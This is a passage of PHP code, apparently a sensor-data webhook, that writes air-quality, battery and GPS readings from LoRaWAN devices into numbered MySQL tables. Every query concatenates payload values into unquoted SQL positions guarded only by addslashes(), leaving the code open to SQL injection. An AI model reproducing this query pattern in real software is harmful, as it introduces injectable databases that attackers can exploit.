$sql = 'INSERT INTO measurement378 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement379 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement380 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode134 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=134';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000B':
if($data->dev_id == 'ttn_apld_dust_000000000000000b') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement70 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000b') {
logError('hittestress-000000000000000b: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement381 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement382 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement383 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement384 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement385 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement386 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode135 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=135';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000C':
logError('device 0c: '.json_encode($data) );
if($data->dev_id == 'ttn_apld_dust_000000000000000c') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement71 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000c') {
logError('hittestress-000000000000000c: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement387 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement388 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement389 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement390 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement391 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement392 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode136 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=136';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000D':
if($data->dev_id == 'ttn_apld_dust_000000000000000d') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement72 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000d') {
logError('hittestress-000000000000000d: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement393 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement394 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement395 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement396 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement397 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement398 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode137 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=137';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000E':
if($data->dev_id == 'ttn_apld_dust_000000000000000e') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement73 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'hittestress-000000000000000e') {
logError('hittestress-000000000000000e: '.json_encode($data) );
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement399 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement400 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement401 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm2p5)) {
$sql = 'INSERT INTO measurement402 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm2p5);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->Vbat)) {
$sql = 'INSERT INTO measurement403 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->Vbat);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->CpuTemp)) {
$sql = 'INSERT INTO measurement404 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->CpuTemp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->latitude) && isset($data->payload_fields->longitude)) {
if(!(substr($data->payload_fields->latitude, 0, 1) === "0") && !(substr($data->payload_fields->longitude, 0, 1) === "0")) {
$sql = 'INSERT INTO locationnode138 SET Moment=\''.$dateNow.'\', Lat='.addslashes($data->payload_fields->latitude).', Lon='.addslashes($data->payload_fields->longitude);
//echo $sql;
$result = mysqlquery($sql);
$sql = 'UPDATE node SET Lastlocationlat=\''.addslashes($data->payload_fields->latitude).'\', Lastlocationlon=\''.addslashes($data->payload_fields->longitude).'\' WHERE Id=138';
//echo $sql;
$result = mysqlquery($sql);
}
}
}
break;
case '000000000000000F':
if($data->dev_id == 'ttn_apld_dust_000000000000000f') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement74 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000010':
if($data->dev_id == 'ttn_apld_dust_0000000000000010') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement75 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000010') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement205 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement206 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement207 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement208 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000011':
if($data->dev_id == 'ttn_apld_dust_0000000000000011') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement76 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000011') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement209 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement210 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement211 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement212 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000012':
if($data->dev_id == 'ttn_apld_dust_0000000000000012') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement77 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000012') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement213 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement214 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement215 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement216 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000013':
if($data->dev_id == 'ttn_apld_dust_0000000000000013') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement78 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000013') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement217 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement218 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement219 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement220 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000014':
if($data->dev_id == 'ttn_apld_dust_0000000000000014') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement79 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000014') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement221 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement222 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement223 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement224 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000015':
if($data->dev_id == 'ttn_apld_dust_0000000000000015') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement80 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000015') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement225 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement226 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement227 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement228 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000016':
if($data->dev_id == 'ttn_apld_dust_0000000000000016') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement81 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000016') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement229 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement230 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement231 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement232 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000017':
if($data->dev_id == 'ttn_apld_dust_0000000000000017') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement82 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000017') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement233 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement234 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement235 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement236 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000018':
if($data->dev_id == 'ttn_apld_dust_0000000000000018') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement83 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000018') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement237 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement238 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement239 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement240 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000019':
if($data->dev_id == 'ttn_apld_dust_0000000000000019') {
if(isset($data->payload_fields->dust_density_ug_m3)) {
$sql = 'INSERT INTO measurement84 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->dust_density_ug_m3);
//echo $sql;
$result = mysqlquery($sql);
}
}
if($data->dev_id == 'ttn_apld_dust_20180000000000000019') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement241 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement242 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement243 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement244 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000020':
if($data->dev_id == 'ttn_apld_dust_20180000000000000020') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement245 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement246 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement247 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement248 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000021':
if($data->dev_id == 'ttn_apld_dust_20180000000000000021') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement249 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement250 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement251 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement252 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000022':
if($data->dev_id == 'ttn_apld_dust_20180000000000000022') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement253 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement254 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement255 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement256 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000023':
if($data->dev_id == 'ttn_apld_dust_20180000000000000023') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement257 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement258 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement259 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement260 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000024':
if($data->dev_id == 'ttn_apld_dust_20180000000000000024') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement261 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement262 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement263 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement264 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000025':
if($data->dev_id == 'ttn_apld_dust_20180000000000000025') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement265 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement266 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement267 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement268 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000026':
if($data->dev_id == 'ttn_apld_dust_20180000000000000026') {
if(isset($data->payload_fields->temp)) {
$sql = 'INSERT INTO measurement280 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->temp);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->rh)) {
$sql = 'INSERT INTO measurement281 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->rh);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm10)) {
$sql = 'INSERT INTO measurement282 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm10);
//echo $sql;
$result = mysqlquery($sql);
}
if(isset($data->payload_fields->pm25)) {
$sql = 'INSERT INTO measurement283 SET Moment=\''.$dateNow.'\', Tagvalue='.addslashes($data->payload_fields->pm25);
//echo $sql;
$result = mysqlquery($sql);
}
}
break;
case '0000000000000027':
